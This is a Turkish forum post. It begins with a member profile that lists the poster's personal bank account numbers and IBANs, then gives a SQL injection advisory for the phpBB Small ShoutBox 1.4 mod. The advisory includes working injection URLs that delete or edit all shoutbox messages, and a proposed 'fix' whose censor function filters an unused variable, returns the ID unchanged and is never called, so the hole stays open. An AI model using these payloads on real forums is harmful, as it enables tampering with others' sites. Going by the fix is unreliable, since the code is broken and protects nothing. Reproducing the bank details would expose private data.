- Ad
- ZEKİ
- Soyad
- AYGÜN
- Katılım
- 18 Ocak 2019
- Konum
- Yalova
- Konular
- 777
- Mesajlar
- 2,932
- Ticaret - 0%
- Meslek
- Webmaster & SEO
Detay
- Meslek
- Webmaster & SEO
- Tecrübe
- 12 Yıl
- Uzmanlık alanları
- Web tasarım, PHP, SEO, Seslendirme, Video montaj
- İş referanslarım
- youtube.com/channel/UC0EKnd0EWBefw9Wrqw_wrAA
- Üyelik tipi
-
- Bireysel
- Hesap
-
ZEKİ AYGÜN
HESAP NO; 1237-0056746
ŞUBE: DOSAB BURSA
İBAN: TR69 0004 6012 3788 8000 0567 46
- Hesap
-
ZEKİ AYGÜN
HESAP NO: 497-6640783
ŞUBE: GEMLİK
İBAN: TR60 0006 2000 4970 0006 6407 83
- Photoshop
-
- Orta düzey50%
- İllüstratör
-
- Başlangıç düzeyi30%
- UI / UX tasarım
-
- İleri düzey90%
- PHP
-
- Orta düzey50%
- CSS3
-
- İleri düzey90%
- JavaScript
-
- Orta düzey50%
phpBB Mod Small ShoutBox 1.4 Remote EditDelete Messages Vulnerability
Bug:
- Delete All Messages
- shoutbox_view.php?mode=delete&id=-1 or 1=1/*
- Edit Message / Post Message
- shoutbox_view.php?mode=edit&id=-1 or 1=1/&name_id=1 or 1=1/&date_edit=1225915829&name_edit=[NICKNAME]&clean_msg=[MESSAGE]
- Blind SQL Injection
- phpBB2/shoutbox_view.php?mode=delete&id=[Query]
Fix :
shoutbox_view.php açın,açığın kaynaklandıgı kod :
50. $id = ( isset($HTTP_GET_VARS[’id’]) ) ? $HTTP_GET_VARS[’id’] : $HTTP_POST_VARS[’id’];
168. if ( $mode == "delete" && $adel )
169. {
170. $sql = "DELETE FROM " . SHOUTBOX_TABLE . "
171. WHERE id = $id $del_mod";
172. if( !($result = $db->sql_query($sql)) )
173. { message_die(GENERAL_ERROR, ’Could not delete shoutbox message’, ’’, LINE, FILE, $sql); }
174.
En alt satıra inin ve ekleyin,
<?
function censor($id){
$fh = fopen("sqlinj.txt","r");
while($word = fgets($fh,4096)) {
$message = ereg_replace(trim($word)," #*@!-",$message);
}
return $id;
}
?>
dosyanın bulundugu klasöre sqlinj.txt adında bir dosya açın ve ekleyin,
+,-1,union,select,from,delete,where
Benzer konular
- Cevaplar
- 1
- Görüntüleme
- 842